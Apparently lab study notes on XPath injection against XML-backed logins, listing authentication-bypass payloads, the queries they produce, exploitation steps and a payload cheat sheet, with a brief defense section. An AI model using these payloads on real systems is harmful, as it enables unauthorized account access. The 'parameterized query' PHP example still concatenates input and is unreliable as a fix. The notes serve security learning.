# XPath Injection - Authentication Bypass
#### **Key Concepts**
1. **What is XPath?**
* XPath is a query language for selecting nodes from an XML document.
* It is often used in web applications for data retrieval and authentication mechanisms.
2. **What is XPath Injection?**
* An attack technique where an attacker manipulates user input to alter the structure of an XPath query, bypassing authentication or gaining unauthorized access.
***
#### **XPath Query Example**
Consider the following XML user data:
```xml
xmlCopyEdit
htb-stdnt
Academy_student!
admin
admin
```
Authentication might use the following query:
```xpath
xpathCopyEdit/users/user[username/text()='USERNAME' and password/text()='PASSWORD']
```
If user input is unsanitized, injection becomes possible.
***
#### **Common Payloads**
1. **Universal True (Bypass Authentication)**:
```plaintext
' or '1'='1
```
Resulting Query:
```xpath
/users/user[username/text()='' or '1'='1' and password/text()='']
```
2. **Target a Specific User (Admin)**:
```plaintext
admin' or '1'='1
```
Resulting Query:
```xpath
/users/user[username/text()='admin' or '1'='1' and password/text()='irrelevant']
```
3. **Use Position-Based Targeting**:
```plaintext
' or position()=2 or '
```
Change the 2 to an 3 to Pivot to different account
' or position()=3 or '
1. Resulting Query:
/users/user[username/text()='' or position()=2 or '' and password/text()='irrelevant']
* This targets the second user in the XML file (e.g., `admin`).
2. **Substring Matching**:
```plaintext
' or contains(.,'admin') or '
```
Resulting Query:
```xpath
/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='irrelevant']
```
* Searches for any user with "admin" in their username or other fields.
***
#### **Steps to Exploit**
1. **Analyze Application Behavior**:
* Understand how usernames and passwords are processed (e.g., via POST requests, cookies, etc.).
2. **Test for Injection Points**:
* Inject payloads into the username or password fields to observe server responses.
3. **Craft Payloads**:
* Use payloads like `position()` or `contains()` to refine your query targeting.
4. **Privilege Escalation**:
* Use payloads to access specific accounts or enumerate users until the desired privileges are obtained.
***
#### **Practical Exploitation Example**
**Payload to Target Admin (Second User):**
```plaintext
username=' or position()=2 or '&password=irrelevant
```
**Response Example**:
* Successfully logged in as `WELCOME SUPERUSER!`.
***
#### **Defense Measures**
1. **Sanitize Inputs**:
* Use proper input validation and encoding to prevent injection.
* Reject special characters like `'`, `"`, `[`, and `]`.
2. **Parameterized Queries**:
* Avoid dynamically building XPath queries. Use parameterized XPath APIs:
```php
$query = "/users/user[username/text()=$username and password/text()=$password]";
```
3. **Hash Passwords**:
* Ensure passwords are hashed before storage and comparison.
4. **Error Messages**:
* Avoid detailed error messages that reveal query structures.
***
#### **Key Takeaways**
* XPath Injection is similar to SQL Injection but targets XML queries.
* Functions like `position()` and `contains()` can help refine targeting in complex scenarios.
* Proper sanitization and secure coding practices are essential to mitigate these attacks.
***
#### **Payloads to Remember**
| **Scenario** | **Payload** | **Result** |
| ---------------------------------- | ------------------------------- | ------------------------------------- |
| Bypass Authentication | `' or '1'='1` | Logs in as the first user. |
| Target Specific User (e.g., Admin) | `admin' or '1'='1` | Logs in as admin. |
| Position-Based User Targeting | `' or position()=2 or '` | Logs in as the second user. |
| Substring Matching (Admin) | `' or contains(.,'admin') or '` | Finds users with "admin" in username. |